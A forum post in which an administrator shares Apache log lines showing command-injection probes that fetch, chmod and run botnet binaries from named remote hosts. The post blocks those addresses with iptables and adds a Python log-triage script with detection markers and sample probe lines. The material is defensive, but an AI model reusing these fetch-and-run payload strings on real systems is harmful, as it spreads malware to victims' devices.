Security flaw: NW_BBBarm7?

I saw this in the logs:

59.21.219.217 - - [01/Apr/2022:03:31:59 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.103.237.21 - - [01/Apr/2022:03:32:24 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.105.54.139 - - [01/Apr/2022:04:24:22 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.85.179.149 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.178.152.80 - - [01/Apr/2022:09:46:47 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
123.56.177.98 - - [01/Apr/2022:10:14:00 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
222.173.108.94 - - [01/Apr/2022:11:42:19 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"

So I filtered the IPs:

#  iptables -A INPUT -s 59.21.219.217 -j DROP
#  iptables -A INPUT -s 39.103.237.21 -j DROP
#  iptables -A INPUT -s 39.105.54.139 -j DROP
#  iptables -A INPUT -s 222.85.179.149 -j DROP
#  iptables -A INPUT -s 222.178.152.80 -j DROP
#  iptables -A INPUT -s 123.56.177.98 -j DROP
#  iptables -A INPUT -s 222.173.108.94 -j DROP
#  iptables -A INPUT -s 51.81.133.91 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

The IP: 51.81.133.91

Location: Hong Kong SAR, China
Reputation: 100%
Anonymity: none detected
Usage: assigned
Source: ARIN
Hostname: ip91.ip-51-81-133.us
I also saw:

# grep " 400 " /var/log/apache2/access.humhub.log | grep shell | grep -v NW_BBBarm
39.103.239.37 - - [01/Apr/2022:00:34:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
41.36.111.76 - - [01/Apr/2022:05:06:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 0 "-" "-"
47.100.208.164 - - [01/Apr/2022:06:24:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
39.103.232.57 - - [01/Apr/2022:09:36:04 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"

So I filtered:

#  iptables -A INPUT -s 39.103.239.37 -j DROP
#  iptables -A INPUT -s 41.36.111.76 -j DROP
#  iptables -A INPUT -s 47.100.208.164 -j DROP
#  iptables -A INPUT -s 39.103.232.57 -j DROP
#  iptables -A INPUT -s 146.0.75.242 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

The IP: 146.0.75.242

Location: Netherlands
Reputation: 86%
Anonymity: none detected
Usage: assigned
Source: RIPE
Hostname: 146.0.75.242
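The triage done above (grep the access log for the `/shell?` command-injection probes, collect the client IPs and the host the payload is fetched from, then emit one DROP rule per address) can be scripted so it is repeatable and deduplicated. The script below is an added example, not code from the original post: it parses Apache combined-format lines, URL-decodes the request, flags the shell fragments the probes carry (including the encoded `;#` that survives in the truncated entries), pulls the download host named after `wget`, and renders the same `iptables -A INPUT -s ... -j DROP` rules. The sample log lines are constructed for the example and use RFC 5737 documentation addresses and a placeholder download host, not the scanner or payload addresses quoted in the post; only the request shapes mirror them.

```python
import re
from ipaddress import ip_address
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined format. Addresses are RFC 5737
# documentation ranges and "payload.example" is a placeholder; the request
# shapes copy the probes seen in the post, including one truncated entry
# and one benign request that must not be flagged.
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Apr/2022:03:31:59 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/198.51.100.7/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"',
    r'192.0.2.11 - - [01/Apr/2022:05:06:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ payload.example/jaws;sh+/tmp/jaws" 400 0 "-" "-"',
    r'192.0.2.10 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/198.51.100.7/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"',
    r'192.0.2.12 - - [01/Apr/2022:10:14:00 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"',
    r'203.0.113.5 - - [01/Apr/2022:10:20:00 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# client ip, ident, user, [timestamp] "request" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')
# Decoded shell fragments carried by the probes; ";#" is the %3b%23
# terminator-plus-comment that remains visible even in truncated entries.
MARKERS = ("cd /tmp", "wget ", "chmod 777", "rm -rf", "sh /tmp", ";#")
# Host named after wget, tolerating the "http:/\\/" mangling seen in the logs
# and a bare host with no scheme.
WGET_HOST_RE = re.compile(r'wget\s+(?:https?:[/\\]+)?([A-Za-z0-9.\-]+)')


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["req"])  # %3b -> ';', '+' -> ' '
    return rec


def triage(lines):
    """One finding per suspicious request: client IP, HTTP status,
    the markers that matched and any download host named in the payload."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [mk for mk in MARKERS if mk in rec["decoded"]]
        if not hits:
            continue
        findings.append({
            "ip": rec["ip"],
            "status": int(rec["status"]),
            "markers": hits,
            "hosts": WGET_HOST_RE.findall(rec["decoded"]),
        })
    return findings


def _is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def block_list(findings):
    """Deduplicated addresses to drop: the scanning clients plus any payload
    host given as an IP literal. Hostnames are returned separately because
    'iptables -s name' resolves once at insert time, which is not reliable."""
    ips, names = [], []
    for f in findings:
        for cand in [f["ip"], *f["hosts"]]:
            bucket = ips if _is_ip_literal(cand) else names
            if cand not in bucket:
                bucket.append(cand)
    return ips, names


def iptables_rules(findings):
    """Render the same DROP rules the post applies, one per unique address."""
    ips, _ = block_list(findings)
    return [f"iptables -A INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["markers"], f["hosts"])
    for rule in iptables_rules(found):
        print(rule)
    _, names = block_list(found)
    if names:
        print("# hostnames to handle by DNS or egress policy, not -s:", ", ".join(names))
```

Run it against a real log with `triage(open("/var/log/apache2/access.humhub.log"))`; the 400 status recorded in each finding is the server rejecting the request, so the finding documents a probe, not a successful command execution. The rules are printed rather than applied so they can be reviewed before being added and saved with `iptables-save` as in the post.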
